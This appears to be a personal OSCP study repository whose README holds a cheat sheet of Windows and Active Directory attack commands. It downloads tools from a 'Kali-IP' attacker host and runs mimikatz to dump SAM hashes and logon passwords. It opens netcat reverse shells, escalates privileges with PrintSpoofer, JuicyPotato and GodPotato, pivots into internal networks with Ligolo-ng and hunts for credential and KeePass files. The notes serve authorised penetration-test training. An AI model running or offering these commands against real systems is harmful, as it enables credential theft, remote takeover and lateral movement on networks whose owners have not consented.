├── My-Notes └── README.md /My-Notes: -------------------------------------------------------------------------------- 1 | 2 | =================================== Active Directory ======================================= 3 | 4 | iwr -uri http://Kali-IP/mimikatz.exe -Outfile mimikatz.exe 5 | .\mimikatz.exe 6 | lsadump::sam // Dump sam hashes 7 | sekurlsa::logonpasswords // Dump logon passwords 8 | lsadump::cache //dump cache stored passwords 9 | 10 | iwr -uri http://Kali-IP/powerview.ps1 -Outfile powerview.ps1 // Upload PowerView on a Windows target 11 | 12 | 13 | iwr -uri http://Kali-IP/ADenum.ps1 -Outfile ADenum.ps1 //Upload AD Enum on windows target 14 | iwr -uri http://Kali-IP/SharpHound.ps1 -Outfile SharpHound.ps1 //Upload AD Enum on SharpHound target 15 | 16 | iwr -uri http://Kali-IP/adPEAS.ps1 -Outfile adPEAS.ps1 //Upload adPEAS on windows target (adPEAS is an AD scanner) 17 | //run adPEAS 18 | Import-Module .\adPEAS.ps1 19 | Invoke-adPEAS -Domain oscp.htb -Force 20 | 21 | 22 | ================================== NetCat ======================================== 23 | iwr -uri http://Kali-IP/nc64.exe -Outfile nc64.exe 24 | nc64.exe Kali-IP 6666 -e cmd.exe 25 | =============================== Privilege Escalation =========================================== 26 | 27 | iwr -uri http://Kali-IP/winPEASx64.exe -Outfile winPEASx64.exe //Upload winPEASx64 on windows target 28 | 29 | iwr -uri http://Kali-IP/PrintSpoofer64.exe -Outfile PrintSpoofer64.exe //Upload PrintSpoofer64 on windows target 30 | .\PrintSpoofer.exe -i -c cmd // this command will escalate the privilege to system within the same shell 31 | .\PrintSpoofer64.exe -i -c "nc64.exe Kali-IP 6666 -e cmd.exe" // this command will use nc64.exe to establish a reverse shell to kali 32 | 33 | 34 | echo c:\Users\kohsuke\Desktop\nc64.exe 10.10.14.8 6666 -e cmd.exe > reverse.bat //this command will prepare nc64.exe to be ready to used by juicypotato 35 | juicypotato.exe -l 6666 -p c:\Users\kohsuke\Desktop\reverse.bat -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} // executing juicypotato 36 | 37 | // the below three binaries are GodPotato tool, which is used to escalate privileges when seimpersonateprivilege is enable when executing whoami /priv on windows host 38 | iwr -uri http://Kali-IP/GodPotato-NET4.exe -Outfile GodPotato-NET4.exe 39 | iwr -uri http://Kali-IP/GodPotato-NET35.exe -Outfile GodPotato-NET35.exe 40 | iwr -uri http://Kali-IP/GodPotato-NET2.exe -Outfile GodPotato-NET2.exe 41 | 42 | // this is how to run each one, if one didn't work, try the another one! 43 | .\GodPotato-NET4.exe -cmd "C:\users\backup_service\desktop\nc64.exe Kali-IP 5555 -e cmd.exe" 44 | .\GodPotato-NET35.exe -cmd "C:\users\Public\nc64.exe Kali-IP 6666 -e cmd.exe" 45 | .\GodPotato-NET2.exe -cmd "C:\users\Public\nc64.exe Kali-IP 5555 -e cmd.exe" 46 | 47 | 48 | iwr -uri http://Kali-IP/PowerUp.ps1 -Outfile PowerUp.ps1 // Upload PowerUp on a Windows target 49 | 50 | //those three commands will run PowerUp tool and start for PE check. 51 | powershell -ep bypass 52 | . .\PowerUp.ps1 53 | Invoke-AllChecks 54 | ================================== Pivoting with Ligolo-ng ======================================== 55 | cd /home/kali/Desktop/adtools // step one change directory where is proxy located 56 | ip tuntap add user kali mode tun ligolo // add ligolo interface to kali 57 | ip link set ligolo up // set it UP 58 | ./proxy // start the proxy 59 | 60 | // now from the target machine where you have multiple interfaces and one of them is related to internal network 61 | iwr -uri http://Kali-IP/agent.exe -Outfile agent.exe // upload agent.exe using powershell 62 | agent.exe -connect Kali-IP:11601 -ignore-cert // start it 63 | ip route add 10.20.78.0/24 dev ligolo // on kali add route 64 | // now you have access to the internal network. 65 | 66 | 67 | listener_add --addr 0.0.0.0:1234 --to Kali-IP:80 --tcp // lets say you have access to the internal network, you comprimised one of the internal network hosts, 68 | // you now need to upload something from you kali, but there is no direct connection from the internal host to kali, but you still have the host that you used to run agent.exe, this command will make this host a bridge between the internal host and you kali machine, when you try to upload something to the internal host, 69 | // put the ip of the host in the middle and port 1234, and it will send the request to port 80 on kali. 70 | 71 | 72 | socat -ddd TCP-LISTEN:8888,fork TCP:127.0.0.1:8000 // use socat when you need to access a localhost of a machine from your kali. 73 | 74 | ssh -N -R 127.0.0.1:7788:127.0.0.1:60002 kali@Kali-IP // this one will do the same as above. 75 | 76 | =============================== File Mining to find Creds on windows hosts =========================================== 77 | 78 | 79 | Get-ChildItem -Path C:\users -Include *.sam,*.txt,*.ps1,*.log,*.exe,*.kdbx,*.gitconfig,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue 80 | 81 | Get-ChildItem -Path / -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue // this one will look for kdbx files which contain a password manager database 82 | 83 | Get-ChildItem -Path C:\ -Include backup.* -File -Recurse -ErrorAction SilentlyContinue 84 | 85 | 86 | Get-ChildItem -Path C:\ -Include local.txt -File -Recurse -ErrorAction SilentlyContinue 87 | Get-ChildItem -Path C:\ -Include proof.txt -File -Recurse -ErrorAction SilentlyContinue 88 | 89 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # OSCP-notes --------------------------------------------------------------------------------